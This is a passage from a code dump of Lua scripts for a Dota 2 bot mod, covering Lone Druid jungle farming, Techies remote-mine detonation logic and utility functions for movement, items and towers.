"text": "\nfunction GetDesire()\n\treturn _G.desires[1]\nend\n"
},
{
"alpha_fraction": 0.6731975078582764,
"alphanum_fraction": 0.6833855509757996,
"avg_line_length": 30.636363983154297,
"blob_id": "32f439c8691c185f4291cca8e74ef951664102bb",
"content_id": "40c3fe29c440b5037a017c895a196477519f3173",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 3828,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 121,
"path": "/mode_farm_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal targetCamp = nil\nlocal spawners = GetNeutralSpawners()\nlocal finishedCamps = {}\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal botLevel = npcBot:GetLevel()\n\tlocal aghaSlot = npcBot:FindItemSlot(\"item_ultimate_scepter\")\n\t\n\tif gameTime < 0 then\n\t\treturn _G.desires[7]\n\tend\n\tif npcBot:GetItemSlotType(aghaSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\treturn _G.desires[1]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction Think()\n\tlocal gameTime = DotaTime()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal botAction = npcBot:GetCurrentActionType()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHealth = npcBot:GetHealth()\n\tlocal botMaxHealth = npcBot:GetMaxHealth()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHPRegen = npcBot:GetHealthRegen()\n\tlocal botManaRegen = npcBot:GetManaRegen()\n\tlocal level = npcBot:GetLevel()\n\tlocal currentGold = npcBot:GetGold()\n\tlocal currentLane = nil\n\t\n local spirit = npcBot:GetAbilityByName(\"lone_druid_spirit_bear\")\n local rabid = npcBot:GetAbilityByName(\"lone_druid_rabid\")\n local roar = npcBot:GetAbilityByName(\"lone_druid_savage_roar\")\n local form = npcBot:GetAbilityByName(\"lone_druid_true_form\")\n\t\n\tif gameTime < 0 then\n\t\tlocal tower = GetTower(botTeam, TOWER_MID_1)\n\t\tif botAction ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\tnpcBot:Action_MoveToLocation(tower:GetLocation() + RandomVector(300))\n\t\t\tif npcBot.bear ~= nil and npcBot.bear:IsAlive() then\n\t\t\t\tnpcBot.bear:Action_MoveToLocation(tower:GetLocation() + RandomVector(300))\n\t\t\tend\n\t\tend\n\t\treturn\n\tend\n\t\n\tif targetCamp == nil then\n\t\tlocal gotCamp = false\n\t\tfor s = 1, table.getn(spawners) do\n\t\t\tlocal spawner = spawners[s]\n\t\t\t\n\t\t\tif spawner[\"team\"] == botTeam and ((level <= 3 and (spawner[\"type\"] == \"small\" or spawner[\"type\"] == \"medium\"))\n\t\t\tor (level < 6 and (spawner[\"type\"] == \"medium\" or spawner[\"type\"] == \"large\"))\n\t\t\tor (level >= 6 and (spawner[\"type\"] == \"medium\" or spawner[\"type\"] == \"large\" or spawner[\"type\"] == \"ancient\"))) then\n\t\t\t\tlocal found = false\n\t\t\t\tfor i = 1, table.getn(finishedCamps) do\n\t\t\t\t\tlocal finished = finishedCamps[i]\n\t\t\t\t\t\n\t\t\t\t\tif finished[1] == spawner[\"location\"][1] and finished[2] == spawner[\"location\"][2] then\n\t\t\t\t\t\tfound = true\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tif not found then\n\t\t\t\t\ttargetCamp = Vector(spawner[\"location\"][1], spawner[\"location\"][2], 0)\n\t\t\t\t\tgotCamp = true\n\t\t\t\t\tbreak\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t\n\t\t-- Reset camps once they're all destroyed\n\t\tif not gotCamp then\n\t\t\tfinishedCamps = {}\n\t\tend\n\telse\n\t\tlocal dist = GetUnitToLocationDistance(npcBot, targetCamp)\n\t\t\n\t\tif dist > 500 then\n\t\t\tif botAction ~= BOT_ACTION_TYPE_MOVE_TO then\n \t\t\tnpcBot:Action_MoveToLocation(targetCamp + RandomVector(100))\n\t\t\tend\n\t\t\tif npcBot.bear ~= nil and npcBot.bear:GetCurrentActionType() ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\t\tnpcBot.bear:Action_MoveToLocation(targetCamp + RandomVector(100))\n\t\t\tend\n\t\telse\n\t\t\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(500)\n\t\t\tlocal numNeutrals = table.getn(neutrals)\n\t\t\t\n\t\t\tif numNeutrals > 0 then\n\t\t\t\tlocal easiest = neutrals[1]\n\t\t\t\t\n\t\t\t\tfor i = 2, numNeutrals do\n\t\t\t\t\tif neutrals[i]:GetHealth() < easiest:GetHealth() then\n\t\t\t\t\t\teasiest = neutrals[i]\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tif botAction ~= BOT_ACTION_TYPE_ATTACK and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\t\t\tnpcBot:Action_AttackUnit(easiest, true)\n\t\t\t\t\t\n\t\t\t\t\tif npcBot.bear ~= nil then\n\t\t\t\t\t\tif npcBot.bear:GetCurrentActionType() ~= BOT_ACTION_TYPE_ATTACK and npcBot.bear:GetCurrentActionType() ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\t\t\t\t\tnpcBot.bear:Action_AttackUnit(easiest, true)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\telse\n\t\t\t\ttable.insert(finishedCamps, targetCamp)\n\t\t\t\ttargetCamp = nil\n\t\t\tend\n\t\tend\n\tend\nend\n"
},
{
"alpha_fraction": 0.6908690929412842,
"alphanum_fraction": 0.696809709072113,
"avg_line_length": 29.09933853149414,
"blob_id": "ad9f50a3d76a5f8743ba745df2222d4d0ab345c0",
"content_id": "3b3c64f93d3e2f0afcfa06576580ccba8d1ef3b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 4545,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 151,
"path": "/bot_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\");\nrequire(GetScriptDirectory()..\"/UtilityFunctions\");\n\nlocal npcBot = GetBot();\nlocal botTeam = GetTeam();\nnpcBot.other_mode = nil\n\n-- Keep a reference to each mine\nlocal remoteMines = {};\nlocal proxMines = {};\n\nnpcBot.canAttackTower = true\n\n-- Detonate only enough Remote Mines to kill an enemy player and no more\nfunction MinionThink(hMinionUnit)\n\tif hMinionUnit ~= nil then\n\t\tlocal unitName = hMinionUnit:GetUnitName();\n\t\tif unitName == \"npc_dota_techies_remote_mine\" then\n\t\t\tlocal remoteDetonate = hMinionUnit:GetAbilityByName(\"techies_remote_mines_self_detonate\");\n\t\t\tlocal remoteLevel = npcBot:GetAbilityByName(\"techies_remote_mines\"):GetLevel();\n\t\t\tlocal nRadius = remoteDetonate:GetSpecialValueInt(\"radius\");\n\t\t\tlocal numHeroes = 0;\n\t\t\tlocal nearbyHeroes = hMinionUnit:GetNearbyHeroes(nRadius, true, BOT_MODE_NONE);\n\t\t\tlocal nearbyCreeps = hMinionUnit:GetNearbyCreeps(nRadius, true);\n\t\t\t\n\t\t\tremoteMines = _G.getAllUnitsByName(\"npc_dota_techies_remote_mine\", UNIT_LIST_ALLIES);\n\n\t\t\t-- Get all nearby enemies\n\t\t\tif table.getn(nearbyHeroes) then\n \t\t\tfor _, hero in pairs(nearbyHeroes) do\n \t\t\t\tif hero:IsHero() then\n \t\t\t\t\thMinionUnit:SetTarget(hero)\n \t\t\t\t\tlocal minesDetonated = detonateMines(remoteLevel, hero, remoteDetonate, npcBot);\n \t\t\t\t\tnumHeroes = numHeroes + 1;\n \t\t\t\tend\n \t\t\tend\n\t\t\telseif table.getn(nearbyCreeps) > 3 then\n\t\t\t\tlocal nearbyMines = {}\n\t\t\t\tfor m = 1, table.getn(remoteMines) do\n\t\t\t\t\tlocal mine = remoteMines[m]\n\t\t\t\t\tlocal creep = nearbyCreeps[1]\n\t\t\t\t\tlocal dist = GetUnitToUnitDistance(mine, creep)\n\t\t\t\t\t\n\t\t\t\t\tif dist < nRadius then\n\t\t\t\t\t\ttable.insert(nearbyMines, mine)\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tnearbyMines[1]:Action_UseAbility(remoteDetonate)\n\t\t\tend\n\t\telseif unitName == \"npc_dota_techies_land_mine\" then\n\t\t\tproxMines = _G.getAllUnitsByName(\"npc_dota_techies_land_mine\", UNIT_LIST_ALLIES);\n\t\tend\n\tend\n\t-- Add to total proximity and remote mines currently active\n\t_G.total_prox = #proxMines;\n\t_G.total_remotes = #remoteMines;\nend\n\nfunction minesToKillEnemy(remoteLevel, enemyBot, bot)\n\tlocal health = enemyBot:GetHealth();\n\tlocal mineDmg = 0;\n\tlocal modifier = 0;\n\tlocal enemyResist = enemyBot:GetMagicResist(); -- this is a percentage\n\t-- print(\"Enemy Resistance:\", enemyResist);\n\tif bot:HasModifier(\"modifier_item_ultimate_scepter\") or\n\t bot:HasModifier(\"modifier_item_ultimate_scepter_consumed\") then\n\t\tmodifier = 150;\n\tend\n\tif remoteLevel == 1 then\n\t\tmineDmg = 300 + modifier;\n\telseif remoteLevel == 2 then\n\t\tmineDmg = 450 + modifier;\n\telse\n\t\tmineDmg = 750 + modifier;\n\tend\n\tmineDmg = mineDmg - (mineDmg * enemyResist);\n\tlocal numMines = health/mineDmg;\n\n\t-- print(\"Number of MINES to kill enemy:\", health, mineDmg, number, remoteLevel, math.ceil(number))\n\n\treturn math.ceil(numMines);\nend\n\n-- See if mines have been detonated, then remove them\n-- Also check if the enemy is someone else and update\nfunction analyzeMines(enemyBot)\n\tfor i, mine in pairs(remoteMines) do\n\t\tif mine:IsNull() then\n\t\t\ttable.remove(remoteMines, i)\n\t\t\t-- print(\"mine removed, already dead\");\n\t\telse\n\t\t\tlocal target = mine:GetTarget()\n\t\t\tif target ~= enemyBot then\n\t\t\t\t-- print(\"Target has moved out of range... removing target from mine\")\n\t\t\t\tenemyBot:SetTarget(nil)\n\t\t\tend\t\n\t\tend\n\tend\nend\n\n-- Analyze all mines with the same target and detonate enough\n-- mines to kill the enemy, and no more\nfunction detonateMines(remoteLevel, enemyBot, ability, bot)\n\tanalyzeMines(enemyBot)\n\tlocal numMines = minesToKillEnemy(remoteLevel, enemyBot, bot)\n\tlocal minesDetonated = 0\n\tlocal totalMines = 0\n\tfor _, mine in pairs(remoteMines) do\n\t\tif mine:GetTarget() == enemyBot then\n\t\t\ttotalMines = totalMines + 1\n\t\tend\n\tend\n\tif totalMines >= numMines then\n\t\tfor _, mine in pairs(remoteMines) do\n\t\t\tlocal target = mine:GetTarget()\n\n\t\t\tif target == enemyBot then\n\t\t\t\tmine:Action_UseAbility(ability)\n\t\t\t\tminesDetonated = minesDetonated + 1\n\n\t\t\t\tif minesDetonated == numMines then\n\t\t\t\t\treturn minesDetonated\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\nend\n\nfunction printAllCreepAttackers(creepList)\n\tif creepList ~= nil then\n\t\tfor _, creep in pairs(creepList) do\n\t\t\tif creep ~= nil then\n\t\t\t\tfor _, creepTable in pairs(creep) do\n\t\t\t\t\tif creepTable ~= nil then\n\t\t\t\t\t\tfor i, creepData in ipairs(creepTable) do\n\t\t\t\t\t\t\tif i == 0 then\n\t\t\t\t\t\t\t\tprint(\"allied creep:\", creepData:GetUnitName())\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\tprint(\" attacker\", creepData:GetUnitName())\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tend\n\t\t\t\t\t\tprint(\" \")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\telse\n\t\tprint(\"No Attackers\")\n\tend\nend\n"
},
{
"alpha_fraction": 0.6235190033912659,
"alphanum_fraction": 0.6436261534690857,
"avg_line_length": 27.292072296142578,
"blob_id": "886c5f48768512ed839148e7c7eb69df49d34a09",
"content_id": "866511d3e6e691ee2fbdd3a4a7172d3dc31d6a66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 20341,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 719,
"path": "/UtilityFunctions.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\");\n\nfunction fillTalentTable(bot)\n\tlocal skills = {};\n\tfor i = 0, 23 \n\tdo\n\t\tlocal ability = bot:GetAbilityInSlot(i);\n\t\tif ability ~= nil and ability:IsTalent() then\n\t\t\ttable.insert(skills, ability:GetName());\n\t\tend\n\tend\n\treturn skills\nend\n\n-- Gets a list of units of a specific type,\n-- then narrows the list down to only ones with a specific name\nfunction getAllUnitsByName(unitName, unitType)\n\tlocal units = {};\n\tfor _, unit in pairs(GetUnitList(unitType)) do\n\t\tif unit:GetUnitName() == unitName then\n\t\t\ttable.insert(units, unit);\n\t\tend\n\tend\n\n\treturn units;\nend\n\nlocal currentAction = 0;\nlocal arcaneBoots = nil;\nlocal pointBooster = nil;\nlocal droppedPB = false;\nlocal droppedAB = false;\n\n-- Use Soul Ring, after dropping Arcane Boots and Point Booster if owned\n-- Returns true if at least Soul Ring was used\nfunction useSoulRing(bot)\n\tlocal SoulRing = nil;\n\tlocal queue = bot:NumQueuedActions();\n\tlocal action = bot:GetCurrentActionType();\n\n\tfor i = 0, 5, 1 do\n\t\tlocal item = bot:GetItemInSlot(i);\n\t\tif item ~= nil then\n\t\t\tlocal itemName = item:GetName();\n\t\t\tif itemName == \"item_soul_ring\" then\n\t\t\t\tSoulRing = item;\n\t\t\telseif itemName == \"item_arcane_boots\" then\n\t\t\t\tarcaneBoots = item;\n\t\t\t\t-- hasArcane = true;\n\t\t\telseif itemName == \"item_point_booster\" then\n\t\t\t\tpointBooster = item;\n\t\t\t\t-- hasPB = true;\n\t\t\tend\n\t\tend\n\tend\n\n\tif SoulRing ~= nil and SoulRing:IsFullyCastable() then\n\t\tbot:ActionPush_UseAbility(SoulRing);\n\telseif arcaneBoots ~= nil and arcaneBoots:IsFullyCastable() then\n\t\tbot:ActionPush_UseAbility(arcaneBoots);\n\tend\n\n\t-- if SoulRing == nil then\n\t-- \treturn false;\n\t-- elseif arcaneBoots == nil and pointBooster == nil and SoulRing:IsFullyCastable() and not usedRing then\n\t-- \tprint(\"USING ITEM soul ring, Arcane Boots: \"..((arcaneBoots == nil) and \"false\" or \"true\")..\" Point Booster: \"..((pointBooster == nil) and \"false\" or \"true\"));\n\t-- \tbot:ActionPush_UseAbility(SoulRing);\n\t-- \tusedRing = true;\n\t-- elseif SoulRing:IsFullyCastable() or usedRing then\n\t-- \t-------------------------------------------------------------------------\n\t-- \t-- Bot currently drops arcane boots and point booster as intended, \n\t-- \t-- but does not pick them back up after using Soul Ring\n\t-- \t-------------------------------------------------------------------------\n\n\t-- \tlocal botLoc = bot:GetLocation();\n\t-- \t-- if currentAction == 0 and queue == 0 then\n\t-- \t-- \tif arcaneBoots ~= nil then\n\t-- \t-- \t\tbot:ActionQueue_DropItem(arcaneBoots, botLoc + RandomVector(10));\n\t-- \t-- \t\tprint(\"ARCANE BOOTS DROPPED!\");\n\t-- \t-- \t\tdroppedAB = true;\n\t-- \t-- \tend\n\t-- \t-- \tcurrentAction = 1;\n\t-- \t-- elseif currentAction == 1 and queue == 0 then\n\t-- \t-- \tif pointBooster ~= nil then\n\t-- \t-- \t\tbot:ActionQueue_DropItem(pointBooster, botLoc + RandomVector(20));\n\t-- \t-- \t\tprint(\"POINT BOOSTER DROPPED!\");\n\t-- \t-- \t\tdroppedPB = true;\n\t-- \t-- \tend\n\t-- \t-- \tcurrentAction = 2;\n\t-- \t-- else\n\t-- \t-- if currentAction == 2 and queue == 0 then\n\t-- \t\tbot:ActionPush_UseAbility(SoulRing);\n\t-- \t\t-- currentAction = 3;\n\t-- \t-- elseif currentAction == 3 and queue == 0 then\n\t-- \t-- \tif droppedAB then\n\t-- \t-- \t\tif action ~= _G.actions[\"pick_item\"] then\n\t-- \t-- \t\t\tbot:ActionQueue_PickUpItem(arcaneBoots);\n\t-- \t-- \t\t\tdroppedAB = false;\n\t-- \t-- \t\tend\n\t-- \t-- \tend\n\t-- \t-- \tcurrentAction = 4;\n\t-- \t-- elseif currentAction == 4 and queue == 0 then\n\t-- \t-- \tif droppedPB then\n\t-- \t-- \t\tif action ~= _G.actions[\"pick_item\"] then\n\t-- \t-- \t\t\tbot:ActionQueue_PickUpItem(pointBooster);\n\t-- \t-- \t\t\tdroppedPB = false;\n\t-- \t-- \t\tend\n\t-- \t-- \tend\n\t-- \t-- \tcurrentAction = 5;\n\t-- \t-- end\n\t-- end\n\t-- if currentAction == 5 then\n\t-- \treturn true;\n\t-- end\nend\n\nfunction hasItem(itemToFind, bot)\n\titemSlot = bot:FindItemSlot(itemToFind);\n\tif itemSlot >= 0 then\n\t\treturn true;\n\tend\n\treturn false;\nend\n\n-- Find an item in the bot's inventory and use it if it's\n-- able to be used or hasn't already been used.\n-- Returns false if the item was not able to be used\nfunction useItem(bot, item_name, target, modifier)\n\tif bot:HasModifier(modifier) then\n\t\treturn false;\n\telse\n\t\tlocal item = nil;\n\t\tfor i = 0, 5, 1 do\n\t\t\tlocal itemSlot = bot:GetItemInSlot(i);\n\t\t\tif itemSlot ~= nil then\n\t\t\t\tlocal itemName = itemSlot:GetName();\n\t\t\t\tif itemName == item_name then\n\t\t\t\t\titem = itemSlot;\n\t\t\t\t\tbreak;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tif item ~= nil then\n\t\t\tif target ~= nil then\n\t\t\t\tif item_name == \"item_tango\" then\n\t\t\t\t\tbot:ActionPush_UseAbilityOnTree(item, bot);\n\t\t\t\telse\n\t\t\t\t\tbot:ActionPush_UseAbilityOnEntity(item, bot);\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tbot:ActionPush_UseAbility(item);\n\t\t\tend\n\t\t\treturn true;\n\t\tend\n\t\treturn false;\n\tend\nend\n\n-- Get's the distance between two points on the map\nfunction getDistanceBetweenTwoPoints(vector1, vector2)\n\tx1 = vector1[1];\n\ty1 = vector1[2];\n\tx2 = vector2[1];\n\ty2 = vector2[2];\n\n\txd = x1-x2;\n\tyd = y1-y2\n\treturn math.sqrt((xd * xd) + (yd * yd));\nend\n\n-- Get a location farther away from a point\n-- Used to get a location to move away from an enemy\n-- Since there may be obstacles in the way, best to use a very far distance\n-- and cancel move when needed\n-- TODO: be able to consider more than one enemy and find the optimal fallback location\nfunction getRetreatLocation(botLoc, enemyLoc, distance)\n\t-- local currDistance = getDistanceBetweenTwoPoints(vector1, vector2);\n\tlocal slope = (botLoc[2] - enemyLoc[2]) / (botLoc[1] - enemyLoc[1])\n\tlocal theta = math.atan(slope);\n\tlocal newX = botLoc[1] + distance * (math.cos(theta));\n\tlocal newY = botLoc[2] + distance * (math.sin(theta));\n\n\tif newX > 8200 then\n\t\tnewX = 8200;\n\telseif newX < -8200 then\n\t\tnewX = -8200;\n\tend\n\n\tif newY > 8200 then\n\t\tnewY = 8200;\n\telseif newY < -8200 then\n\t\tnewY = -8200;\n\tend\n\t\n\treturn Vector(newX, newY);\nend\n\n-- Check where the bot is within the lane and return a fallback location\n-- in the opposite direction from the enemy\nfunction getFallbackInLane(lane, botLoc, fallbackDist)\n\tif lane ~= LANE_MID then\n\t\tif botTeam == TEAM_RADIANT then\n\t\t\tif lane == LANE_TOP then\n\t\t\t\tlocal dist1 = PointToLineDistance(_G.top_lane[1], _G.top_lane[2], botLoc);\n\t\t\t\tlocal dist2 = PointToLineDistance(_G.top_lane[2], _G.top_lane[3], botLoc);\n\n\t\t\t\tif dist1 ~= nil and dist2 ~= nil then\n\t\t\t\t\tif dist1[1] < dist2[1] then\n\t\t\t\t\t\treturn (botLoc - Vector(0, fallbackDist));\n\t\t\t\t\telse\n\t\t\t\t\t\treturn (botLoc - Vector(fallbackDist, 0));\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tlocal dist1 = PointToLineDistance(_G.bot_lane[1], _G.bot_lane[2], botLoc);\n\t\t\t\tlocal dist2 = PointToLineDistance(_G.bot_lane[2], _G.bot_lane[3], botLoc);\n\n\t\t\t\tif dist1 ~= nil and dist2 ~= nil then\n\t\t\t\t\tif dist1.distance < dist2.distance then\n\t\t\t\t\t\treturn (botLoc - Vector(fallbackDist, 0));\n\t\t\t\t\telse\n\t\t\t\t\t\treturn (botLoc - Vector(0, fallbackDist));\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\telse\n\t\t\tif lane == LANE_TOP then\n\t\t\t\tlocal dist1 = PointToLineDistance(_G.top_lane[3], _G.top_lane[2], botLoc);\n\t\t\t\tlocal dist2 = PointToLineDistance(_G.top_lane[2], _G.top_lane[1], botLoc);\n\n\t\t\t\tprint(\"Fallback1: \"..dist1.closest_point[1]..\",\"..dist1.closest_point[2]);\n print(\"Fallback2: \"..dist2.closest_point[1]..\",\"..dist2.closest_point[2]);\n\n if dist1 == nil or dist2 == nil then\n if dist1 == nil then\n return (botLoc + Vector(0, fallbackDist));\n else\n return (botLoc + Vector(fallbackDist, 0));\n end\n end\n\n\t\t\t\tif dist1 ~= nil and dist2 ~= nil then\n\t\t\t\t\tif dist1.distance < dist2.distance then\n local fallbackPoint = botLoc + Vector(0, fallbackDist);\n\t\t\t\t\t\treturn fallbackPoint;\n\t\t\t\t\telse\n local fallbackPoint = botLoc + Vector(fallbackDist, 0);\n\t\t\t\t\t\treturn fallbackPoint;\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tlocal dist1 = PointToLineDistance(_G.bot_lane[3], _G.bot_lane[2], botLoc);\n\t\t\t\tlocal dist2 = PointToLineDistance(_G.bot_lane[2], _G.bot_lane[1], botLoc);\n\n\t\t\t\tif dist1 ~= nil and dist2 ~= nil then\n\t\t\t\t\tif dist1.distance < dist2.distance then\n\t\t\t\t\t\treturn (botLoc + Vector(fallbackDist, 0));\n\t\t\t\t\telse\n\t\t\t\t\t\treturn (botLoc + Vector(0, fallbackDist));\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\telse\n\t\treturn (botLoc - Vector(fallbackDist / 2, fallbackDist / 2));\n\tend\nend\n\n-- Returns all towers within a lane that are still alive\n-- The two towers at base are referenced by LANE_NONE\n-- if lane == 5, then all living towers will be returned\nfunction getAllTowersInLane(lane, team)\n\tlocal towersStatus = {};\n\tif lane == LANE_NONE or lane == 5 then\n\t\tT1 = GetTower(team, _G.towers[10]);\n\t\tT2 = GetTower(team, _G.towers[11]);\n\t\tif T1 ~= nil then table.insert(towersStatus, T1) end;\n\t\tif T2 ~= nil then table.insert(towersStatus, T2) end;\n\telseif lane == LANE_TOP or lane == 5 then\n\t\tT1 = GetTower(team, _G.towers[1]);\n\t\tT2 = GetTower(team, _G.towers[4]);\n\t\tT3 = GetTower(team, _G.towers[7]);\n\t\tif T1 ~= nil then table.insert(towersStatus, T1) end;\n\t\tif T2 ~= nil then table.insert(towersStatus, T2) end;\n\t\tif T3 ~= nil then table.insert(towersStatus, T3) end;\n\telseif lane == LANE_MID or lane == 5 then\n\t\tT1 = GetTower(team, _G.towers[2]);\n\t\tT2 = GetTower(team, _G.towers[5]);\n\t\tT3 = GetTower(team, _G.towers[8]);\n\t\tif T1 ~= nil then table.insert(towersStatus, T1) end;\n\t\tif T2 ~= nil then table.insert(towersStatus, T2) end;\n\t\tif T3 ~= nil then table.insert(towersStatus, T3) end;\n\telseif lane == LANE_BOT or lane == 5 then\n\t\tT1 = GetTower(team, _G.towers[3]);\n\t\tT2 = GetTower(team, _G.towers[6]);\n\t\tT3 = GetTower(team, _G.towers[9]);\n\t\tif T1 ~= nil then table.insert(towersStatus, T1) end;\n\t\tif T2 ~= nil then table.insert(towersStatus, T2) end;\n\t\tif T3 ~= nil then table.insert(towersStatus, T3) end;\n\tend\n\treturn towersStatus;\nend\n\n-- Returns the team's specific object\nfunction getTeamObject(team, rad, dir)\n\tif team == _G.teams[1] then\n\t\treturn rad;\n\telse\n\t\treturn dir;\n\tend\nend\n\n-- Checks if a bot is stuck and not moving\n-- Use this function for sequences where a \n-- bot can possible stop moving for no reason\nfunction isStuck(locArray, currentLoc)\n\t-- Bot's been stuck long enough\n\tif table.getn(locArray) >= 15 then\n\t\tlocArray = {};\n\t\treturn true;\n\telse\n\t\t-- Since all entries are the same, \n\t\t-- check only first element\n\t\tif table.getn(locArray) > 0 then\n\t\t\tif locArray[1] ~= currentLoc then\n\t\t\t\tlocArray = {};\n\t\t\telse\n\t\t\t\ttable.insert(currentLoc);\n\t\t\tend\n\t\tend\n\tend\n\treturn false;\nend\n\n-- Returns the unit that has the lowest amount of HP in the group\nfunction getWeakestEnemyUnit(unitTable)\n\tlocal currHP = 10000;\n\tlocal lowestUnit = nil;\n\n\tfor _, unit in pairs(unitTable) do\n\t\tlocal unitHP = unit:GetHeath();\n\t\tif unitHP < currHP then\n\t\t\tcurrHP = unitHP;\n\t\t\tlowestUnit = unit;\n\t\tend\n\tend\n\n\treturn unit;\nend\n\nfunction getLocationFromPoint(botLoc, targetLoc, distFromPoint)\n\tlocal newX = botLoc[1];\n\tlocal newY = botLoc[2];\n\tlocal newLoc = Vector(newX, newY);\n\n\twhile true do\n\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, newLoc);\n\t\tif math.abs(dist) <= distFromPoint then\n\t\t\treturn newLoc\n\t\telse\n\t\t\tnewX = (newLoc[1] + targetLoc[1])/2;\n\t\t\tnewY = (newLoc[2] + targetLoc[2])/2;\n\t\t\tnewLoc = Vector(newX, newY);\n\t\tend\n\tend\nend\n\n-- Returns a list of all towers HP status in the lane specified\nfunction GetTowerStatus(lane, side)\n\tlocal t1HP = 0\n\tlocal t2HP = 0\n\tlocal t3HP = 0\n\tif side == TEAM_RADIANT then\n\t\tif lane == \"top\" then\n\t\t\tlocal t1 = GetTower(side, TOWER_TOP_1)\n\t\t\tlocal t2 = GetTower(side, TOWER_TOP_2)\n\t\t\tlocal t3 = GetTower(side, TOWER_TOP_3)\n\t\t\tif t1 ~= nil then\n\t\t\t\tt1HP = t1:GetHealth()\n\t\t\tend\n\t\t\tif t1 ~= nil then\n\t\t\t\tt2HP = t2:GetHealth()\n\t\t\tend\n\t\t\tif t1 ~= nil then\n\t\t\t\tt3HP = t3:GetHealth()\n\t\t\tend\n\t\t\treturn {t1HP, t2HP, t3HP}\n\t\telseif lane == \"mid\" then\n\t\t\tlocal t1 = GetTower(side, TOWER_MID_1)\n\t\t\tlocal t2 = GetTower(side, TOWER_MID_2)\n\t\t\tlocal t3 = GetTower(side, TOWER_MID_3)\n\t\t\tif t1 ~= nil then\n\t\t\t\tt1HP = t1:GetHealth()\n\t\t\tend\n\t\t\tif t1 ~= nil then\n\t\t\t\tt2HP = t2:GetHealth()\n\t\t\tend\n\t\t\tif t1 ~= nil then\n\t\t\t\tt3HP = t3:GetHealth()\n\t\t\tend\n\t\t\treturn {t1HP, t2HP, t3HP}\n\t\telseif lane == \"bot\" then\n\t\t\tlocal t1 = GetTower(side, TOWER_BOT_1)\n\t\t\tlocal t2 = GetTower(side, TOWER_BOT_2)\n\t\t\tlocal t3 = GetTower(side, TOWER_BOT_3)\n\t\t\tif t1 ~= nil then\n\t\t\t\tt1HP = t1:GetHealth()\n\t\t\tend\n\t\t\tif t1 ~= nil then\n\t\t\t\tt2HP = t2:GetHealth()\n\t\t\tend\n\t\t\tif t1 ~= nil then\n\t\t\t\tt3HP = t3:GetHealth()\n\t\t\tend\n\t\t\treturn {t1HP, t2HP, t3HP}\n\t\telse\n\t\t\tlocal t1 = GetTower(side, TOWER_BASE_1)\n\t\t\tlocal t2 = GetTower(side, TOWER_BASE_2)\n\t\t\tif t1 ~= nil then\n\t\t\t\tt1HP = t1:GetHealth()\n\t\t\tend\n\t\t\tif t1 ~= nil then\n\t\t\t\tt2HP = t2:GetHealth()\n\t\t\tend\n\t\t\treturn {t1HP, t2HP}\n\t\tend\n\tend\nend\n\n-- Returns the lane's front location and amount as a list\nfunction GetLaneCreepStatus(lane, side)\n\tlocal frontLocation = GetLaneFrontLocation(side, lane, 50)\n\tlocal frontAmount = GetLaneFrontAmount(side, lane, true)\n\t\n\treturn {frontLocation, frontAmount}\nend\n\n-- Gets the vector location of a point p percentage between you and the target\nfunction getVectorBetweenTargetPercentage(you, target, p)\n\tlocal youLoc = you:GetLocation()\n\tlocal youX = youLoc[1]\n\tlocal youY = youLoc[2]\n\t\n\tlocal targetLoc = target:GetLocation()\n\tlocal targetX = targetLoc[1]\n\tlocal targetY = targetLoc[2]\n--\t\n--\tlocal a = p*(targetX - youX)\n--\tlocal b = p*(targetY - youY)\n--\t\n--\treturn Vector(youX + a, youY + a, 0)\n\n\tlocal locX = youX + (math.abs(youX) - math.abs(targetX))*p\n\tlocal locY = youY + (math.abs(youY) - math.abs(targetY))*p\n\t\n\treturn Vector(locX, locY, 0)\nend\n\n-- Gets the vector location of a point p percentage between you and the target\nfunction getVectorBetweenTargetDistance(you, target, d)\n\tlocal youLoc = you:GetLocation()\n\tlocal youX = youLoc[1]\n\tlocal youY = youLoc[2]\n\t\n\tlocal targetLoc = target:GetLocation()\n\tlocal targetX = targetLoc[1]\n\tlocal targetY = targetLoc[2]\n\n\tlocal dist 